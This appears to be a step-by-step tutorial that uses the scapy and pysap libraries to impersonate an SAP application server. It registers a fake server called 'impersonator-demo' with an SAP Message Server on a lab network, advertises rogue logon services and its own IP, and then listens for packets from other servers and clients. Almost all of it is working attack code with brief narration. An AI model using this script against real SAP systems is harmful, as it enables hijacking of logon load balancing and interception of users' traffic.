Import the libraries, bind the protocol layer
from scapy.all import *
from pysap.SAPNI import *
from pysap.SAPMS import *
bind_layers(SAPNI, SAPMS, )
In this case, we will need to connect to the target server as first step:
# Initiate the connection
sock = socket.socket()
sock.connect(("192.168.56.102", 3900))
conn = SAPNIStreamSocket(sock)
We can tell the Message Server which version we're running:
prop = SAPMSProperty(id=7, release="720", patchno=70, supplvl=0, platform=0)
p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname="impersonator-demo", opcode=0x43, property=prop)
p.show()
conn.send(p)
And then perform a login enabling the services we are suppose to support as application servers:
p = SAPMS(flag=0x08, iflag=0x08, msgtype=0x89, toname="-", fromname="impersonator-demo")
p.show()
response = conn.sr(p)[SAPMS]
response.show()
We tell the Message Server we are starting:
p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x05, toname="-", fromname="impersonator-demo")
p.show()
conn.send(p)
Next we will tell the Message Server our IP address:
p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname="impersonator-demo", opcode=0x06, opcode_version=0x02,
change_ip_addressv4="192.168.56.1")
p.show()
response = conn.sr(p)[SAPMS]
response.show()
Set which logon services we provide:
l = SAPMSLogon(type=2, port=3200, address="192.168.56.1", host="impersonator-demo", misc="LB=3")
p = SAPMS(flag=0x01, iflag=0x01, msgtype=0x01, toname="MSG_SERVER", fromname="impersonator-demo", opcode=0x2b, logon=l)
p.show()
response = conn.sr(p)[SAPMS]
response.show()
We set the IP Address property:
prop = SAPMSProperty(client="impersonator-demo", id=0x03, address="192.168.56.1")
p = SAPMS(flag=0x02, iflag=0x01, toname="-", fromname="impersonator-demo",
opcode=0x43, property=prop)
p.show()
response = conn.sr(p)[SAPMS]
response.show()
And finally change our status to active:
p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x01, toname="-", fromname="impersonator-demo")
conn.send(p)
We can now start listening to packets from another application servers or clients:
response = conn.recv()[SAPMS]
response.show()
response = conn.recv()[SAPMS]
response.show()
response = conn.recv()[SAPMS]
response.show()
response = conn.recv()[SAPMS]
response.show()